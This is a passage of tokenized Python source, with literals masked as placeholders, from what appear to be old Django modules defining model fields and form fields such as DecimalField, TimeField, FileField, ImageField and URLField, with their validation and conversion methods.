ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def _format ( self , value ) : <EOL> if isinstance ( value , basestring ) or value is None : <EOL> return value <EOL> else : <EOL> return self . format_number ( value ) <EOL> def format_number ( self , value ) : <EOL> """<STR_LIT>""" <EOL> from django . db . backends import util <EOL> return util . format_number ( value , self . max_digits , self . decimal_places ) <EOL> def get_db_prep_save ( self , value , connection ) : <EOL> return connection . ops . value_to_db_decimal ( self . to_python ( value ) , <EOL> self . max_digits , self . decimal_places ) <EOL> def get_prep_value ( self , value ) : <EOL> return self . to_python ( value ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : self . max_digits , <EOL> '<STR_LIT>' : self . decimal_places , <EOL> '<STR_LIT>' : forms . DecimalField , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( DecimalField , self ) . formfield ( ** defaults ) <EOL> class EmailField ( CharField ) : <EOL> default_validators = [ validators . validate_email ] <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT:max_length>' ] = kwargs . get ( '<STR_LIT:max_length>' , <NUM_LIT> ) <EOL> CharField . __init__ ( self , * args , ** kwargs ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : forms . EmailField , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( EmailField , self ) . formfield ( ** defaults ) <EOL> class FilePathField ( Field ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , verbose_name = None , name = None , path = '<STR_LIT>' , match = None , recursive = False , ** kwargs ) : <EOL> self . path , self . match , self . recursive = path , match , recursive <EOL> kwargs [ '<STR_LIT:max_length>' ] = kwargs . get ( '<STR_LIT:max_length>' , <NUM_LIT:100> ) <EOL> Field . 
__init__ ( self , verbose_name , name , ** kwargs ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT:path>' : self . path , <EOL> '<STR_LIT>' : self . match , <EOL> '<STR_LIT>' : self . recursive , <EOL> '<STR_LIT>' : forms . FilePathField , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( FilePathField , self ) . formfield ( ** defaults ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> class FloatField ( Field ) : <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( "<STR_LIT>" ) , <EOL> } <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_prep_value ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> return float ( value ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return value <EOL> try : <EOL> return float ( value ) <EOL> except ( TypeError , ValueError ) : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . FloatField } <EOL> defaults . update ( kwargs ) <EOL> return super ( FloatField , self ) . formfield ( ** defaults ) <EOL> class IntegerField ( Field ) : <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( "<STR_LIT>" ) , <EOL> } <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_prep_value ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> return int ( value ) <EOL> def get_prep_lookup ( self , lookup_type , value ) : <EOL> if ( lookup_type == '<STR_LIT>' or lookup_type == '<STR_LIT>' ) and isinstance ( value , float ) : <EOL> value = math . ceil ( value ) <EOL> return super ( IntegerField , self ) . 
get_prep_lookup ( lookup_type , value ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return value <EOL> try : <EOL> return int ( value ) <EOL> except ( TypeError , ValueError ) : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . IntegerField } <EOL> defaults . update ( kwargs ) <EOL> return super ( IntegerField , self ) . formfield ( ** defaults ) <EOL> class BigIntegerField ( IntegerField ) : <EOL> empty_strings_allowed = False <EOL> description = _ ( "<STR_LIT>" ) <EOL> MAX_BIGINT = <NUM_LIT> <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : - BigIntegerField . MAX_BIGINT - <NUM_LIT:1> , <EOL> '<STR_LIT>' : BigIntegerField . MAX_BIGINT } <EOL> defaults . update ( kwargs ) <EOL> return super ( BigIntegerField , self ) . formfield ( ** defaults ) <EOL> class IPAddressField ( Field ) : <EOL> empty_strings_allowed = False <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT:max_length>' ] = <NUM_LIT:15> <EOL> Field . __init__ ( self , * args , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . IPAddressField } <EOL> defaults . update ( kwargs ) <EOL> return super ( IPAddressField , self ) . formfield ( ** defaults ) <EOL> class NullBooleanField ( Field ) : <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( "<STR_LIT>" ) , <EOL> } <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT:null>' ] = True <EOL> kwargs [ '<STR_LIT:blank>' ] = True <EOL> Field . 
__init__ ( self , * args , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> if value in ( True , False ) : <EOL> return bool ( value ) <EOL> if value in ( '<STR_LIT:None>' , ) : <EOL> return None <EOL> if value in ( '<STR_LIT:t>' , '<STR_LIT:True>' , '<STR_LIT:1>' ) : <EOL> return True <EOL> if value in ( '<STR_LIT:f>' , '<STR_LIT:False>' , '<STR_LIT:0>' ) : <EOL> return False <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def get_prep_lookup ( self , lookup_type , value ) : <EOL> if value in ( '<STR_LIT:1>' , '<STR_LIT:0>' ) : <EOL> value = bool ( int ( value ) ) <EOL> return super ( NullBooleanField , self ) . get_prep_lookup ( lookup_type , value ) <EOL> def get_prep_value ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> return bool ( value ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : forms . NullBooleanField , <EOL> '<STR_LIT>' : not self . blank , <EOL> '<STR_LIT:label>' : capfirst ( self . verbose_name ) , <EOL> '<STR_LIT>' : self . help_text } <EOL> defaults . update ( kwargs ) <EOL> return super ( NullBooleanField , self ) . formfield ( ** defaults ) <EOL> class PositiveIntegerField ( IntegerField ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : <NUM_LIT:0> } <EOL> defaults . update ( kwargs ) <EOL> return super ( PositiveIntegerField , self ) . formfield ( ** defaults ) <EOL> class PositiveSmallIntegerField ( IntegerField ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : <NUM_LIT:0> } <EOL> defaults . update ( kwargs ) <EOL> return super ( PositiveSmallIntegerField , self ) . 
formfield ( ** defaults ) <EOL> class SlugField ( CharField ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT:max_length>' ] = kwargs . get ( '<STR_LIT:max_length>' , <NUM_LIT:50> ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> super ( SlugField , self ) . __init__ ( * args , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . SlugField } <EOL> defaults . update ( kwargs ) <EOL> return super ( SlugField , self ) . formfield ( ** defaults ) <EOL> class SmallIntegerField ( IntegerField ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> class TextField ( Field ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def get_prep_value ( self , value ) : <EOL> if isinstance ( value , basestring ) or value is None : <EOL> return value <EOL> return smart_unicode ( value ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . Textarea } <EOL> defaults . update ( kwargs ) <EOL> return super ( TextField , self ) . formfield ( ** defaults ) <EOL> class TimeField ( Field ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , verbose_name = None , name = None , auto_now = False , auto_now_add = False , ** kwargs ) : <EOL> self . auto_now , self . auto_now_add = auto_now , auto_now_add <EOL> if auto_now or auto_now_add : <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> Field . 
__init__ ( self , verbose_name , name , ** kwargs ) <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def to_python ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> if isinstance ( value , datetime . time ) : <EOL> return value <EOL> if isinstance ( value , datetime . datetime ) : <EOL> return value . time ( ) <EOL> value = smart_str ( value ) <EOL> if '<STR_LIT:.>' in value : <EOL> try : <EOL> value , usecs = value . split ( '<STR_LIT:.>' ) <EOL> usecs = int ( usecs ) <EOL> except ValueError : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> else : <EOL> usecs = <NUM_LIT:0> <EOL> kwargs = { '<STR_LIT>' : usecs } <EOL> try : <EOL> return datetime . time ( * time . strptime ( value , '<STR_LIT>' ) [ <NUM_LIT:3> : <NUM_LIT:6> ] , <EOL> ** kwargs ) <EOL> except ValueError : <EOL> try : <EOL> return datetime . time ( * time . strptime ( value , '<STR_LIT>' ) [ <NUM_LIT:3> : <NUM_LIT:5> ] , <EOL> ** kwargs ) <EOL> except ValueError : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def pre_save ( self , model_instance , add ) : <EOL> if self . auto_now or ( self . auto_now_add and add ) : <EOL> value = datetime . datetime . now ( ) . time ( ) <EOL> setattr ( model_instance , self . attname , value ) <EOL> return value <EOL> else : <EOL> return super ( TimeField , self ) . pre_save ( model_instance , add ) <EOL> def get_prep_value ( self , value ) : <EOL> return self . to_python ( value ) <EOL> def get_db_prep_value ( self , value , connection , prepared = False ) : <EOL> if not prepared : <EOL> value = self . get_prep_value ( value ) <EOL> return connection . ops . value_to_db_time ( value ) <EOL> def value_to_string ( self , obj ) : <EOL> val = self . _get_val_from_obj ( obj ) <EOL> if val is None : <EOL> data = '<STR_LIT>' <EOL> else : <EOL> data = val . 
strftime ( "<STR_LIT>" ) <EOL> return data <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : forms . TimeField } <EOL> defaults . update ( kwargs ) <EOL> return super ( TimeField , self ) . formfield ( ** defaults ) <EOL> class URLField ( CharField ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , verbose_name = None , name = None , verify_exists = True , ** kwargs ) : <EOL> kwargs [ '<STR_LIT:max_length>' ] = kwargs . get ( '<STR_LIT:max_length>' , <NUM_LIT:200> ) <EOL> CharField . __init__ ( self , verbose_name , name , ** kwargs ) <EOL> self . validators . append ( validators . URLValidator ( verify_exists = verify_exists ) ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : forms . URLField , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( URLField , self ) . formfield ( ** defaults ) <EOL> class XMLField ( TextField ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , verbose_name = None , name = None , schema_path = None , ** kwargs ) : <EOL> self . schema_path = schema_path <EOL> Field . __init__ ( self , verbose_name , name , ** kwargs ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> import os <EOL> import re <EOL> import time <EOL> import urlparse <EOL> import warnings <EOL> from decimal import Decimal , DecimalException <EOL> try : <EOL> from cStringIO import StringIO <EOL> except ImportError : <EOL> from StringIO import StringIO <EOL> from django . core . exceptions import ValidationError <EOL> from django . core import validators <EOL> import django . utils . copycompat as copy <EOL> from django . utils import formats <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils . encoding import smart_unicode , smart_str <EOL> from django . utils . functional import lazy <EOL> from django . core . validators import EMPTY_VALUES <EOL> from util import ErrorList <EOL> from widgets import TextInput , PasswordInput , HiddenInput , MultipleHiddenInput , FileInput , CheckboxInput , Select , NullBooleanSelect , SelectMultiple , DateInput , DateTimeInput , TimeInput , SplitDateTimeWidget , SplitHiddenDateTimeWidget <EOL> __all__ = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> def en_format ( name ) : <EOL> """<STR_LIT>""" <EOL> from django . conf . locale . en import formats <EOL> warnings . 
warn ( <EOL> "<STR_LIT>" % ( name , name ) , <EOL> PendingDeprecationWarning <EOL> ) <EOL> return getattr ( formats , name ) <EOL> DEFAULT_DATE_INPUT_FORMATS = lazy ( lambda : en_format ( '<STR_LIT>' ) , tuple , list ) ( ) <EOL> DEFAULT_TIME_INPUT_FORMATS = lazy ( lambda : en_format ( '<STR_LIT>' ) , tuple , list ) ( ) <EOL> DEFAULT_DATETIME_INPUT_FORMATS = lazy ( lambda : en_format ( '<STR_LIT>' ) , tuple , list ) ( ) <EOL> class Field ( object ) : <EOL> widget = TextInput <EOL> hidden_widget = HiddenInput <EOL> default_validators = [ ] <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> creation_counter = <NUM_LIT:0> <EOL> def __init__ ( self , required = True , widget = None , label = None , initial = None , <EOL> help_text = None , error_messages = None , show_hidden_initial = False , <EOL> validators = [ ] , localize = False ) : <EOL> if label is not None : <EOL> label = smart_unicode ( label ) <EOL> self . required , self . label , self . initial = required , label , initial <EOL> self . show_hidden_initial = show_hidden_initial <EOL> if help_text is None : <EOL> self . help_text = u'<STR_LIT>' <EOL> else : <EOL> self . help_text = smart_unicode ( help_text ) <EOL> widget = widget or self . widget <EOL> if isinstance ( widget , type ) : <EOL> widget = widget ( ) <EOL> self . localize = localize <EOL> if self . localize : <EOL> widget . is_localized = True <EOL> extra_attrs = self . widget_attrs ( widget ) <EOL> if extra_attrs : <EOL> widget . attrs . update ( extra_attrs ) <EOL> self . widget = widget <EOL> self . creation_counter = Field . creation_counter <EOL> Field . creation_counter += <NUM_LIT:1> <EOL> messages = { } <EOL> for c in reversed ( self . __class__ . __mro__ ) : <EOL> messages . update ( getattr ( c , '<STR_LIT>' , { } ) ) <EOL> messages . update ( error_messages or { } ) <EOL> self . error_messages = messages <EOL> self . validators = self . 
default_validators + validators <EOL> def prepare_value ( self , value ) : <EOL> return value <EOL> def to_python ( self , value ) : <EOL> return value <EOL> def validate ( self , value ) : <EOL> if value in validators . EMPTY_VALUES and self . required : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def run_validators ( self , value ) : <EOL> if value in validators . EMPTY_VALUES : <EOL> return <EOL> errors = [ ] <EOL> for v in self . validators : <EOL> try : <EOL> v ( value ) <EOL> except ValidationError , e : <EOL> if hasattr ( e , '<STR_LIT:code>' ) and e . code in self . error_messages : <EOL> message = self . error_messages [ e . code ] <EOL> if e . params : <EOL> message = message % e . params <EOL> errors . append ( message ) <EOL> else : <EOL> errors . extend ( e . messages ) <EOL> if errors : <EOL> raise ValidationError ( errors ) <EOL> def clean ( self , value ) : <EOL> """<STR_LIT>""" <EOL> value = self . to_python ( value ) <EOL> self . validate ( value ) <EOL> self . run_validators ( value ) <EOL> return value <EOL> def widget_attrs ( self , widget ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def __deepcopy__ ( self , memo ) : <EOL> result = copy . copy ( self ) <EOL> memo [ id ( self ) ] = result <EOL> result . widget = copy . deepcopy ( self . widget , memo ) <EOL> return result <EOL> class CharField ( Field ) : <EOL> def __init__ ( self , max_length = None , min_length = None , * args , ** kwargs ) : <EOL> self . max_length , self . min_length = max_length , min_length <EOL> super ( CharField , self ) . __init__ ( * args , ** kwargs ) <EOL> if min_length is not None : <EOL> self . validators . append ( validators . MinLengthValidator ( min_length ) ) <EOL> if max_length is not None : <EOL> self . validators . append ( validators . MaxLengthValidator ( max_length ) ) <EOL> def to_python ( self , value ) : <EOL> "<STR_LIT>" <EOL> if value in validators . 
EMPTY_VALUES : <EOL> return u'<STR_LIT>' <EOL> return smart_unicode ( value ) <EOL> def widget_attrs ( self , widget ) : <EOL> if self . max_length is not None and isinstance ( widget , ( TextInput , PasswordInput ) ) : <EOL> return { '<STR_LIT>' : str ( self . max_length ) } <EOL> class IntegerField ( Field ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , max_value = None , min_value = None , * args , ** kwargs ) : <EOL> self . max_value , self . min_value = max_value , min_value <EOL> super ( IntegerField , self ) . __init__ ( * args , ** kwargs ) <EOL> if max_value is not None : <EOL> self . validators . append ( validators . MaxValueValidator ( max_value ) ) <EOL> if min_value is not None : <EOL> self . validators . append ( validators . MinValueValidator ( min_value ) ) <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> value = super ( IntegerField , self ) . to_python ( value ) <EOL> if value in validators . EMPTY_VALUES : <EOL> return None <EOL> if self . localize : <EOL> value = formats . sanitize_separators ( value ) <EOL> try : <EOL> value = int ( str ( value ) ) <EOL> except ( ValueError , TypeError ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return value <EOL> class FloatField ( IntegerField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> value = super ( IntegerField , self ) . to_python ( value ) <EOL> if value in validators . EMPTY_VALUES : <EOL> return None <EOL> if self . localize : <EOL> value = formats . sanitize_separators ( value ) <EOL> try : <EOL> value = float ( value ) <EOL> except ( ValueError , TypeError ) : <EOL> raise ValidationError ( self . 
error_messages [ '<STR_LIT>' ] ) <EOL> return value <EOL> class DecimalField ( Field ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } <EOL> def __init__ ( self , max_value = None , min_value = None , max_digits = None , decimal_places = None , * args , ** kwargs ) : <EOL> self . max_value , self . min_value = max_value , min_value <EOL> self . max_digits , self . decimal_places = max_digits , decimal_places <EOL> Field . __init__ ( self , * args , ** kwargs ) <EOL> if max_value is not None : <EOL> self . validators . append ( validators . MaxValueValidator ( max_value ) ) <EOL> if min_value is not None : <EOL> self . validators . append ( validators . MinValueValidator ( min_value ) ) <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value in validators . EMPTY_VALUES : <EOL> return None <EOL> if self . localize : <EOL> value = formats . sanitize_separators ( value ) <EOL> value = smart_str ( value ) . strip ( ) <EOL> try : <EOL> value = Decimal ( value ) <EOL> except DecimalException : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return value <EOL> def validate ( self , value ) : <EOL> super ( DecimalField , self ) . validate ( value ) <EOL> if value in validators . EMPTY_VALUES : <EOL> return <EOL> if value != value or value == Decimal ( "<STR_LIT>" ) or value == Decimal ( "<STR_LIT>" ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> sign , digittuple , exponent = value . as_tuple ( ) <EOL> decimals = abs ( exponent ) <EOL> digits = len ( digittuple ) <EOL> if decimals > digits : <EOL> digits = decimals <EOL> whole_digits = digits - decimals <EOL> if self . max_digits is not None and digits > self . max_digits : <EOL> raise ValidationError ( self . 
error_messages [ '<STR_LIT>' ] % self . max_digits ) <EOL> if self . decimal_places is not None and decimals > self . decimal_places : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] % self . decimal_places ) <EOL> if self . max_digits is not None and self . decimal_places is not None and whole_digits > ( self . max_digits - self . decimal_places ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] % ( self . max_digits - self . decimal_places ) ) <EOL> return value <EOL> class DateField ( Field ) : <EOL> widget = DateInput <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , input_formats = None , * args , ** kwargs ) : <EOL> super ( DateField , self ) . __init__ ( * args , ** kwargs ) <EOL> self . input_formats = input_formats <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value in validators . EMPTY_VALUES : <EOL> return None <EOL> if isinstance ( value , datetime . datetime ) : <EOL> return value . date ( ) <EOL> if isinstance ( value , datetime . date ) : <EOL> return value <EOL> for format in self . input_formats or formats . get_format ( '<STR_LIT>' ) : <EOL> try : <EOL> return datetime . date ( * time . strptime ( value , format ) [ : <NUM_LIT:3> ] ) <EOL> except ValueError : <EOL> continue <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> class TimeField ( Field ) : <EOL> widget = TimeInput <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) <EOL> } <EOL> def __init__ ( self , input_formats = None , * args , ** kwargs ) : <EOL> super ( TimeField , self ) . __init__ ( * args , ** kwargs ) <EOL> self . input_formats = input_formats <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value in validators . EMPTY_VALUES : <EOL> return None <EOL> if isinstance ( value , datetime . time ) : <EOL> return value <EOL> for format in self . input_formats or formats . 
get_format ( '<STR_LIT>' ) : <EOL> try : <EOL> return datetime . time ( * time . strptime ( value , format ) [ <NUM_LIT:3> : <NUM_LIT:6> ] ) <EOL> except ValueError : <EOL> continue <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> class DateTimeField ( Field ) : <EOL> widget = DateTimeInput <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , input_formats = None , * args , ** kwargs ) : <EOL> super ( DateTimeField , self ) . __init__ ( * args , ** kwargs ) <EOL> self . input_formats = input_formats <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value in validators . EMPTY_VALUES : <EOL> return None <EOL> if isinstance ( value , datetime . datetime ) : <EOL> return value <EOL> if isinstance ( value , datetime . date ) : <EOL> return datetime . datetime ( value . year , value . month , value . day ) <EOL> if isinstance ( value , list ) : <EOL> if len ( value ) != <NUM_LIT:2> : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> if value [ <NUM_LIT:0> ] in validators . EMPTY_VALUES and value [ <NUM_LIT:1> ] in validators . EMPTY_VALUES : <EOL> return None <EOL> value = '<STR_LIT>' % tuple ( value ) <EOL> for format in self . input_formats or formats . get_format ( '<STR_LIT>' ) : <EOL> try : <EOL> return datetime . datetime ( * time . strptime ( value , format ) [ : <NUM_LIT:6> ] ) <EOL> except ValueError : <EOL> continue <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> class RegexField ( CharField ) : <EOL> def __init__ ( self , regex , max_length = None , min_length = None , error_message = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if error_message : <EOL> error_messages = kwargs . get ( '<STR_LIT>' ) or { } <EOL> error_messages [ '<STR_LIT>' ] = error_message <EOL> kwargs [ '<STR_LIT>' ] = error_messages <EOL> super ( RegexField , self ) . 
__init__ ( max_length , min_length , * args , ** kwargs ) <EOL> if isinstance ( regex , basestring ) : <EOL> regex = re . compile ( regex ) <EOL> self . regex = regex <EOL> self . validators . append ( validators . RegexValidator ( regex = regex ) ) <EOL> class EmailField ( CharField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> default_validators = [ validators . validate_email ] <EOL> def clean ( self , value ) : <EOL> value = self . to_python ( value ) . strip ( ) <EOL> return super ( EmailField , self ) . clean ( value ) <EOL> class FileField ( Field ) : <EOL> widget = FileInput <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u"<STR_LIT>" ) , <EOL> '<STR_LIT>' : _ ( u"<STR_LIT>" ) , <EOL> '<STR_LIT>' : _ ( u"<STR_LIT>" ) , <EOL> '<STR_LIT:max_length>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . max_length = kwargs . pop ( '<STR_LIT:max_length>' , None ) <EOL> super ( FileField , self ) . __init__ ( * args , ** kwargs ) <EOL> def to_python ( self , data ) : <EOL> if data in validators . EMPTY_VALUES : <EOL> return None <EOL> try : <EOL> file_name = data . name <EOL> file_size = data . size <EOL> except AttributeError : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> if self . max_length is not None and len ( file_name ) > self . max_length : <EOL> error_values = { '<STR_LIT>' : self . max_length , '<STR_LIT>' : len ( file_name ) } <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT:max_length>' ] % error_values ) <EOL> if not file_name : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> if not file_size : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return data <EOL> def clean ( self , data , initial = None ) : <EOL> if not data and initial : <EOL> return initial <EOL> return super ( FileField , self ) . 
clean ( data ) <EOL> class ImageField ( FileField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u"<STR_LIT>" ) , <EOL> } <EOL> def to_python ( self , data ) : <EOL> """<STR_LIT>""" <EOL> f = super ( ImageField , self ) . to_python ( data ) <EOL> if f is None : <EOL> return None <EOL> try : <EOL> from PIL import Image <EOL> except ImportError : <EOL> import Image <EOL> if hasattr ( data , '<STR_LIT>' ) : <EOL> file = data . temporary_file_path ( ) <EOL> else : <EOL> if hasattr ( data , '<STR_LIT>' ) : <EOL> file = StringIO ( data . read ( ) ) <EOL> else : <EOL> file = StringIO ( data [ '<STR_LIT:content>' ] ) <EOL> try : <EOL> trial_image = Image . open ( file ) <EOL> trial_image . load ( ) <EOL> if hasattr ( file , '<STR_LIT>' ) : <EOL> file . reset ( ) <EOL> trial_image = Image . open ( file ) <EOL> trial_image . verify ( ) <EOL> except ImportError : <EOL> raise <EOL> except Exception : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> if hasattr ( f , '<STR_LIT>' ) and callable ( f . seek ) : <EOL> f . seek ( <NUM_LIT:0> ) <EOL> return f <EOL> class URLField ( CharField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , max_length = None , min_length = None , verify_exists = False , <EOL> validator_user_agent = validators . URL_VALIDATOR_USER_AGENT , * args , ** kwargs ) : <EOL> super ( URLField , self ) . __init__ ( max_length , min_length , * args , <EOL> ** kwargs ) <EOL> self . validators . append ( validators . URLValidator ( verify_exists = verify_exists , validator_user_agent = validator_user_agent ) ) <EOL> def to_python ( self , value ) : <EOL> if value : <EOL> url_fields = list ( urlparse . 
